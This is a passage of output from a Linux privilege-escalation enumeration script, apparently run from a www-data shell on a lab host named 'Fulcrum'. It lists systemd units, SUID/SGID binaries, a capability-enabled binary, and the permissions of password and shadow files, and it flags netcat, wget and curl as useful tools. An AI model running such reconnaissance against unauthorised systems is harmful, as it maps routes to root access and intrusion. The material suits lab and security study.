-rw-r--r-- 1 root root  532 Sep 13  2017 plymouth-start.service
-rw-r--r-- 1 root root  291 Sep 13  2017 plymouth-switch-root.service
-rw-r--r-- 1 root root  490 Sep 13  2017 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root  467 Sep 13  2017 systemd-ask-password-plymouth.service
-rw-r--r-- 1 root root  193 Aug 31  2017 snap-repair.service
-rw-r--r-- 1 root root  221 Aug 31  2017 snap-repair.timer
-rw-r--r-- 1 root root  192 Aug 31  2017 snapd.autoimport.service
-rw-r--r-- 1 root root  368 Aug 31  2017 snapd.core-fixup.service
-rw-r--r-- 1 root root  290 Aug 31  2017 snapd.refresh.service
-rw-r--r-- 1 root root  323 Aug 31  2017 snapd.refresh.timer
-rw-r--r-- 1 root root  308 Aug 31  2017 snapd.service
-rw-r--r-- 1 root root  281 Aug 31  2017 snapd.socket
-rw-r--r-- 1 root root  474 Aug 31  2017 snapd.system-shutdown.service
-rw-r--r-- 1 root root  513 Aug 23  2017 libvirt-guests.service
-rw-r--r-- 1 root root  606 Aug 23  2017 libvirt-bin.service
-rw-r--r-- 1 root root  417 Aug 23  2017 libvirt-bin.socket
-rw-r--r-- 1 root root  461 Aug 23  2017 virtlockd.service
-rw-r--r-- 1 root root  145 Aug 23  2017 virtlockd.socket
-rw-r--r-- 1 root root  453 Aug 23  2017 virtlogd.service
-rw-r--r-- 1 root root  143 Aug 23  2017 virtlogd.socket
-rw-r--r-- 1 root root  683 Aug 23  2017 lxd.service
-rw-r--r-- 1 root root  206 Aug 23  2017 lxd-bridge.service
-rw-r--r-- 1 root root  318 Aug 23  2017 lxd-containers.service
-rw-r--r-- 1 root root  197 Aug 23  2017 lxd.socket
-rw-r--r-- 1 root root  386 Aug  9  2017 php7.0-fpm.service
drwxr-xr-x 2 root root 4.0K Aug  1  2017 busnames.target.wants
-rw-r--r-- 1 root root  403 Jul 19  2017 -.slice
-rw-r--r-- 1 root root  879 Jul 19  2017 basic.target
-rw-r--r-- 1 root root  379 Jul 19  2017 bluetooth.target
-rw-r--r-- 1 root root  358 Jul 19  2017 busnames.target
-rw-r--r-- 1 root root  770 Jul 19  2017 console-getty.service
-rw-r--r-- 1 root root  742 Jul 19  2017 console-shell.service
-rw-r--r-- 1 root root  791 Jul 19  2017 container-getty@.service
-rw-r--r-- 1 root root  394 Jul 19  2017 cryptsetup-pre.target
-rw-r--r-- 1 root root  366 Jul 19  2017 cryptsetup.target
-rw-r--r-- 1 root root 1010 Jul 19  2017 debug-shell.service
-rw-r--r-- 1 root root  670 Jul 19  2017 dev-hugepages.mount
-rw-r--r-- 1 root root  624 Jul 19  2017 dev-mqueue.mount
-rw-r--r-- 1 root root 1009 Jul 19  2017 emergency.service
-rw-r--r-- 1 root root  431 Jul 19  2017 emergency.target
-rw-r--r-- 1 root root  501 Jul 19  2017 exit.target
-rw-r--r-- 1 root root  440 Jul 19  2017 final.target
-rw-r--r-- 1 root root  460 Jul 19  2017 getty.target
-rw-r--r-- 1 root root 1.5K Jul 19  2017 getty@.service
-rw-r--r-- 1 root root  558 Jul 19  2017 graphical.target
-rw-r--r-- 1 root root  487 Jul 19  2017 halt.target
-rw-r--r-- 1 root root  447 Jul 19  2017 hibernate.target
-rw-r--r-- 1 root root  468 Jul 19  2017 hybrid-sleep.target
-rw-r--r-- 1 root root  630 Jul 19  2017 initrd-cleanup.service
-rw-r--r-- 1 root root  553 Jul 19  2017 initrd-fs.target
-rw-r--r-- 1 root root  790 Jul 19  2017 initrd-parse-etc.service
-rw-r--r-- 1 root root  526 Jul 19  2017 initrd-root-fs.target
-rw-r--r-- 1 root root  640 Jul 19  2017 initrd-switch-root.service
-rw-r--r-- 1 root root  691 Jul 19  2017 initrd-switch-root.target
-rw-r--r-- 1 root root  664 Jul 19  2017 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root  671 Jul 19  2017 initrd.target
-rw-r--r-- 1 root root  501 Jul 19  2017 kexec.target
-rw-r--r-- 1 root root  677 Jul 19  2017 kmod-static-nodes.service
-rw-r--r-- 1 root root  395 Jul 19  2017 local-fs-pre.target
-rw-r--r-- 1 root root  507 Jul 19  2017 local-fs.target
-rw-r--r-- 1 root root  405 Jul 19  2017 machine.slice
-rw-r--r-- 1 root root  473 Jul 19  2017 mail-transport-agent.target
-rw-r--r-- 1 root root  492 Jul 19  2017 multi-user.target
-rw-r--r-- 1 root root  464 Jul 19  2017 network-online.target
-rw-r--r-- 1 root root  461 Jul 19  2017 network-pre.target
-rw-r--r-- 1 root root  480 Jul 19  2017 network.target
-rw-r--r-- 1 root root  514 Jul 19  2017 nss-lookup.target
-rw-r--r-- 1 root root  473 Jul 19  2017 nss-user-lookup.target
-rw-r--r-- 1 root root  354 Jul 19  2017 paths.target
-rw-r--r-- 1 root root  552 Jul 19  2017 poweroff.target
-rw-r--r-- 1 root root  377 Jul 19  2017 printer.target
-rw-r--r-- 1 root root  693 Jul 19  2017 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root  603 Jul 19  2017 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root  568 Jul 19  2017 quotaon.service
-rw-r--r-- 1 root root  612 Jul 19  2017 rc-local.service
-rw-r--r-- 1 root root  543 Jul 19  2017 reboot.target
-rw-r--r-- 1 root root  396 Jul 19  2017 remote-fs-pre.target
-rw-r--r-- 1 root root  482 Jul 19  2017 remote-fs.target
-rw-r--r-- 1 root root  978 Jul 19  2017 rescue.service
-rw-r--r-- 1 root root  486 Jul 19  2017 rescue.target
-rw-r--r-- 1 root root  500 Jul 19  2017 rpcbind.target
-rw-r--r-- 1 root root 1.1K Jul 19  2017 serial-getty@.service
-rw-r--r-- 1 root root  402 Jul 19  2017 shutdown.target
-rw-r--r-- 1 root root  362 Jul 19  2017 sigpwr.target
-rw-r--r-- 1 root root  420 Jul 19  2017 sleep.target
-rw-r--r-- 1 root root  409 Jul 19  2017 slices.target
-rw-r--r-- 1 root root  380 Jul 19  2017 smartcard.target
-rw-r--r-- 1 root root  356 Jul 19  2017 sockets.target
-rw-r--r-- 1 root root  380 Jul 19  2017 sound.target
-rw-r--r-- 1 root root  441 Jul 19  2017 suspend.target
-rw-r--r-- 1 root root  353 Jul 19  2017 swap.target
-rw-r--r-- 1 root root  715 Jul 19  2017 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root  719 Jul 19  2017 sys-kernel-config.mount
-rw-r--r-- 1 root root  662 Jul 19  2017 sys-kernel-debug.mount
-rw-r--r-- 1 root root  518 Jul 19  2017 sysinit.target
-rw-r--r-- 1 root root 1.3K Jul 19  2017 syslog.socket
-rw-r--r-- 1 root root  585 Jul 19  2017 system-update.target
-rw-r--r-- 1 root root  436 Jul 19  2017 system.slice
-rw-r--r-- 1 root root  646 Jul 19  2017 systemd-ask-password-console.path
-rw-r--r-- 1 root root  653 Jul 19  2017 systemd-ask-password-console.service
-rw-r--r-- 1 root root  574 Jul 19  2017 systemd-ask-password-wall.path
-rw-r--r-- 1 root root  681 Jul 19  2017 systemd-ask-password-wall.service
-rw-r--r-- 1 root root  724 Jul 19  2017 systemd-backlight@.service
-rw-r--r-- 1 root root  959 Jul 19  2017 systemd-binfmt.service
-rw-r--r-- 1 root root  650 Jul 19  2017 systemd-bootchart.service
-rw-r--r-- 1 root root 1.0K Jul 19  2017 systemd-bus-proxyd.service
-rw-r--r-- 1 root root  409 Jul 19  2017 systemd-bus-proxyd.socket
-rw-r--r-- 1 root root  497 Jul 19  2017 systemd-exit.service
-rw-r--r-- 1 root root  674 Jul 19  2017 systemd-fsck-root.service
-rw-r--r-- 1 root root  648 Jul 19  2017 systemd-fsck@.service
-rw-r--r-- 1 root root  551 Jul 19  2017 systemd-fsckd.service
-rw-r--r-- 1 root root  540 Jul 19  2017 systemd-fsckd.socket
-rw-r--r-- 1 root root  544 Jul 19  2017 systemd-halt.service
-rw-r--r-- 1 root root  631 Jul 19  2017 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root  501 Jul 19  2017 systemd-hibernate.service
-rw-r--r-- 1 root root  710 Jul 19  2017 systemd-hostnamed.service
-rw-r--r-- 1 root root  778 Jul 19  2017 systemd-hwdb-update.service
-rw-r--r-- 1 root root  519 Jul 19  2017 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root  480 Jul 19  2017 systemd-initctl.service
-rw-r--r-- 1 root root  524 Jul 19  2017 systemd-initctl.socket
-rw-r--r-- 1 root root  731 Jul 19  2017 systemd-journal-flush.service
-rw-r--r-- 1 root root  607 Jul 19  2017 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.1K Jul 19  2017 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 1.3K Jul 19  2017 systemd-journald.service
-rw-r--r-- 1 root root  842 Jul 19  2017 systemd-journald.socket
-rw-r--r-- 1 root root  557 Jul 19  2017 systemd-kexec.service
-rw-r--r-- 1 root root  691 Jul 19  2017 systemd-localed.service
-rw-r--r-- 1 root root 1.2K Jul 19  2017 systemd-logind.service
-rw-r--r-- 1 root root  693 Jul 19  2017 systemd-machine-id-commit.service
-rw-r--r-- 1 root root  967 Jul 19  2017 systemd-modules-load.service
-rw-r--r-- 1 root root  685 Jul 19  2017 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 1.3K Jul 19  2017 systemd-networkd.service
-rw-r--r-- 1 root root  591 Jul 19  2017 systemd-networkd.socket
-rw-r--r-- 1 root root  553 Jul 19  2017 systemd-poweroff.service
-rw-r--r-- 1 root root  614 Jul 19  2017 systemd-quotacheck.service
-rw-r--r-- 1 root root  717 Jul 19  2017 systemd-random-seed.service
-rw-r--r-- 1 root root  548 Jul 19  2017 systemd-reboot.service
-rw-r--r-- 1 root root  757 Jul 19  2017 systemd-remount-fs.service
-rw-r--r-- 1 root root  907 Jul 19  2017 systemd-resolved.service
-rw-r--r-- 1 root root  696 Jul 19  2017 systemd-rfkill.service
-rw-r--r-- 1 root root  617 Jul 19  2017 systemd-rfkill.socket
-rw-r--r-- 1 root root  497 Jul 19  2017 systemd-suspend.service
-rw-r--r-- 1 root root  649 Jul 19  2017 systemd-sysctl.service
-rw-r--r-- 1 root root  655 Jul 19  2017 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Jul 19  2017 systemd-timesyncd.service
-rw-r--r-- 1 root root  598 Jul 19  2017 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root  450 Jul 19  2017 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  703 Jul 19  2017 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root  683 Jul 19  2017 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root  823 Jul 19  2017 systemd-udev-settle.service
-rw-r--r-- 1 root root  743 Jul 19  2017 systemd-udev-trigger.service
-rw-r--r-- 1 root root  578 Jul 19  2017 systemd-udevd-control.socket
-rw-r--r-- 1 root root  570 Jul 19  2017 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root  825 Jul 19  2017 systemd-udevd.service
-rw-r--r-- 1 root root  757 Jul 19  2017 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root  754 Jul 19  2017 systemd-update-utmp.service
-rw-r--r-- 1 root root  573 Jul 19  2017 systemd-user-sessions.service
-rw-r--r-- 1 root root  395 Jul 19  2017 time-sync.target
-rw-r--r-- 1 root root  405 Jul 19  2017 timers.target
-rw-r--r-- 1 root root  417 Jul 19  2017 umount.target
-rw-r--r-- 1 root root  392 Jul 19  2017 user.slice
-rw-r--r-- 1 root root  528 Jul 19  2017 user@.service
-rw-r--r-- 1 root root  342 Jul 17  2017 getty-static.service
-rw-r--r-- 1 root root  153 Jul 17  2017 sigpwr-container-shutdown.service
-rw-r--r-- 1 root root  175 Jul 17  2017 systemd-networkd-resolvconf-update.path
-rw-r--r-- 1 root root  715 Jul 17  2017 systemd-networkd-resolvconf-update.service
-rw-r--r-- 1 root root  311 Jul  5  2017 lxcfs.service
-rw-r--r-- 1 root root  202 Jun 19  2017 apt-daily-upgrade.service
-rw-r--r-- 1 root root  184 Jun 19  2017 apt-daily-upgrade.timer
-rw-r--r-- 1 root root  169 Jun 19  2017 apt-daily.service
-rw-r--r-- 1 root root  212 Jun 19  2017 apt-daily.timer
-rw-r--r-- 1 root root  345 Apr 20  2017 unattended-upgrades.service
-rw-r--r-- 1 root root  385 Mar 16  2017 ssh.service
-rw-r--r-- 1 root root  216 Mar 16  2017 ssh.socket
-rw-r--r-- 1 root root  196 Mar 16  2017 ssh@.service
-rw-r--r-- 1 root root  986 Feb 11  2017 nginx.service
-rw-r--r-- 1 root root  269 Jan 31  2017 setvtrgb.service
-rw-r--r-- 1 root root  491 Jan 12  2017 dbus.service
-rw-r--r-- 1 root root  106 Jan 12 ### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl


[-] Installed compilers:
ii  libllvm4.0:amd64                   1:4.0-1ubuntu1~16.04.2                     amd64        Modular compiler and toolchain technologies, runtime library
ii  libxkbcommon0:amd64                0.5.0-1ubuntu2                             amd64        library interface to the XKB compiler - shared library


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1766 Oct  1  2017 /etc/passwd
-rw-r--r-- 1 root root 855 Oct  1  2017 /etc/group
-rw-r--r-- 1 root root 575 Oct 22  2015 /etc/profile
-rw-r----- 1 root shadow 1019 Oct  1  2017 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 40152 Jun 14  2017 /bin/mount
-rwsr-xr-x 1 root root 27608 Jun 14  2017 /bin/umount
-rwsr-xr-x 1 root root 40128 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 14328 Dec 25  2015 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 428240 Mar 16  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 81672 Aug 31  2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14864 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 38984 Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 54256 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75304 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 23376 Jan 17  2016 /usr/bin/pkexec
-rwsr-sr-x 1 daemon daemon 51464 Jan 14  2016 /usr/bin/at
-rwsr-xr-x 1 root root 32944 May 17  2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 49584 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 32944 May 17  2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 40432 May 17  2017 /usr/bin/chsh


[-] SGID files:
-rwxr-sr-x 1 root shadow 35632 Mar 16  2016 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 35600 Mar 16  2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 10232 Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root utmp 434216 Feb  7  2016 /usr/bin/screen
-rwsr-sr-x 1 daemon daemon 51464 Jan 14  2016 /usr/bin/at
-rwxr-sr-x 1 root shadow 62336 May 17  2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 27368 Jun 14  2017 /usr/bin/wall
-rwxr-sr-x 1 root ssh 358624 Mar 16  2017 /usr/bin/ssh-agent
-rwxr-sr-x 1 root crontab 36080 Apr  5  2016 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 22768 May 17  2017 /usr/bin/expiry


[+] Files with POSIX capabilities set:
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 2584 Feb 18  2016 /etc/gai.conf
-rw-r--r-- 1 root root 497 May  4  2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 703 May  6  2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 100 Jan 10  2017 /etc/sos.conf
-rw-r--r-- 1 root root 1260 Mar 16  2016 /etc/ucf.conf
-rw-r--r-- 1 root root 144 Oct  1  2017 /etc/kernel-img.conf
-rw-r--r-- 1 root root 967 Oct 30  2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 3028 Aug  1  2017 /etc/adduser.conf
-rw-r--r-- 1 root root 2083 Oct  2  2017 /etc/sysctl.conf
-rw-r--r-- 1 root root 10368 Oct  2  2015 /etc/sensors3.conf
-rw-r--r-- 1 root root 92 Oct 22  2015 /etc/host.conf
-rw-r--r-- 1 root root 8464 Oct  4  2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 552 Mar 16  2016 /etc/pam.conf
-rw-r--r-- 1 root root 2969 Nov 10  2015 /etc/debconf.conf
-rw-r--r-- 1 root root 1371 Jan 27  2016 /etc/rsyslog.conf
-rw-r--r-- 1 root root 771 Mar  6  2015 /etc/insserv.conf
-rw-r--r-- 1 root root 34 Jan 27  2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 191 Jan 18  2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 604 Jul  2  2015 /etc/deluser.conf
-rw-r--r-- 1 root root 280 Jun 20  2014 /etc/fuse.conf
-rw-r--r-- 1 root root 6816 May 11  2017 /etc/overlayroot.conf
-rw-r--r-- 1 root root 4781 Mar 17  2016 /etc/hdparm.conf


[-] Location and contents (if accessible) of .bash_history file(s):
/home/blueprint/.bash_history


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 Aug  1  2017 .
drwxr-xr-x 14 root root 4096 Oct  2  2017 ..


### SCAN COMPLETE ####################################
www-data@Fulcrum:/$
